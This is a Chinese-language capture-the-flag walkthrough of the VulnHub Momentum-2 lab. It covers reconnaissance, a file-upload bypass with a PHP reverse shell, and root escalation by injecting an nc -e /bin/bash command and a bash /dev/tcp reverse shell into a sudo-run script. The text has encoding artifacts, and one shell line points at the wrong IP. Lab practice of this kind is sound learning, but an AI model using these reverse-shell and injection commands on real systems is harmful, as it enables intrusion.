靶场练习第二十二天~vulnhub靶场之Momentum-2
一、準(zhǔn)備工作
靶機(jī)下載地址:Momentum: 2 ~ VulnHub
1.查看kali的ip
使用命令ifconfig
2.使用nmap命令
nmap 192.168.101.0/24
查看開(kāi)放的端口和協(xié)議:nmap -sV 192.168.101.114
二、信息收集
1.使用gobuster,尋找隱藏的網(wǎng)站
gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
發(fā)現(xiàn)一個(gè)可以上傳文件的網(wǎng)站:http://192.168.101.114/dashboard.html
2.利用bp抓包軟件將文件上傳
上傳一句話(huà)木馬php文件
訪(fǎng)問(wèn)http://192.168.101.114/ajax.php.bak看到一個(gè)文件,如果參數(shù)為secure,值等于val1d就允許上傳pdf、php、txt文件
抓包添加cookie與參數(shù)
cookie: admin=&G6u@B6uDXMq&Ms
-----------------------------150269877033212106221702063904
Content-Disposition: form-data; name="secure";
val1d
還有將一句話(huà)木馬改成反向連接木馬,自動(dòng)生成的反向連接木馬地址:https://forum.ywhack.com/reverse-shell/將自動(dòng)生成的php反向連接腳本替換掉一句話(huà)木馬
將修改好的數(shù)據(jù)發(fā)送到intruder里面進(jìn)行爆破
添加要爆破的參數(shù)將事先寫(xiě)好的26大寫(xiě)英文字母字典添加到Payload Options爆破返回的長(zhǎng)度一樣,查看返回的參數(shù)哪個(gè)有1
將數(shù)據(jù)上傳,可以發(fā)現(xiàn)上傳成功
三、提權(quán)
1.利用php反向連接腳本連接靶機(jī)
(1)在kali開(kāi)啟監(jiān)聽(tīng)功能:nc -lvvp 8888
(2)訪(fǎng)問(wèn)剛才上傳的反向連接腳本
(3)看一看kali那邊連接情況,已經(jīng)反向連接成功了
(4)第一個(gè)flag
(5)ssh遠(yuǎn)程連接
發(fā)現(xiàn)一個(gè)用戶(hù)密碼: athena、myvulnerableapp*,使用命令:ssh athena@192.168.101.114
(6)提權(quán)payload
查看該用戶(hù)的權(quán)限并且該用戶(hù)能夠利用引用root相關(guān)的執(zhí)行文件有哪些
1.cat /home/team-tasks/cookie-gen.py
將反彈root權(quán)限的shell命令存入seed變量執(zhí)行
echo "bash -c 'exec bash -i &>/dev/tcp/192.168.101.114/4444 <&1'" | base64
1.sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
2.;nc 192.168.101.10 4444 -e /bin/bash;
3.反向連接:nc -lnvp 4444
4.優(yōu)化命令執(zhí)行終端,執(zhí)行下面命令進(jìn)入python交互式(注意要下載python環(huán)境才能運(yùn)行):
python -c ‘import pty;pty.spawn(“/bin/bash”)’
5.第二flag
總結(jié)
以上是生活随笔為你收集整理的靶场练习第二十二天~vulnhub靶场之Momentum-2的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 靶场练习第二十五天~vulnhub靶场之
- 下一篇: [转载]一句话插配置文件